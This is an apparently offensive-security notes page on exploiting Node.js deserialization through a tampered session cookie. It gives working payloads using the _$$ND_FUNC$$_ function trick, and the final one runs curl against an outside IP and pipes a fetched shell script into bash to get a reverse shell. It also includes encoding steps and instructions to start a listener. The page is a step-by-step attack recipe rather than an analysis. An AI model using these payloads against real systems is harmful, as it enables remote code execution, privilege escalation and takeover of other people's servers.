Javascript Vulnerabilities

Javascript Deserializaiton

Notice the assigned session cookie
Attempt to decode the cookie in the decoder tab
Attempt to modify the cookie by either

Cut the cookie in half to see if you can create a server error
Change the cookies values as seen below

When we cut the cookie in half we get a server error
We see that the web application is trying to unserialize the session cookie but it’s getting an error.
Node Js de-serialization vulnerability is the easiest to exploit since the payload doesn’t change that much
We will modify the following payload a bit to get it working

{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ls /',
function(error, stdout, stderr) { console.log(stdout) });\n }()"}

Encode the cookie and see if that payload works to get command injection
Create a reverse shell script and make sure to chmod +x the script
Final Payload

{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl 10.8.2.58:8000/shell.sh | bash ', function(error, stdout, stderr) { console.log(stdout) });\n }()","isAdmin":true,"encoding": "utf-8"}

Start your listener
Encode the payload to Base64 and then URL Encode
Send the request, and get a rev shell!

PreviousCmd Injection NextSSTI

Last updated 1 year ago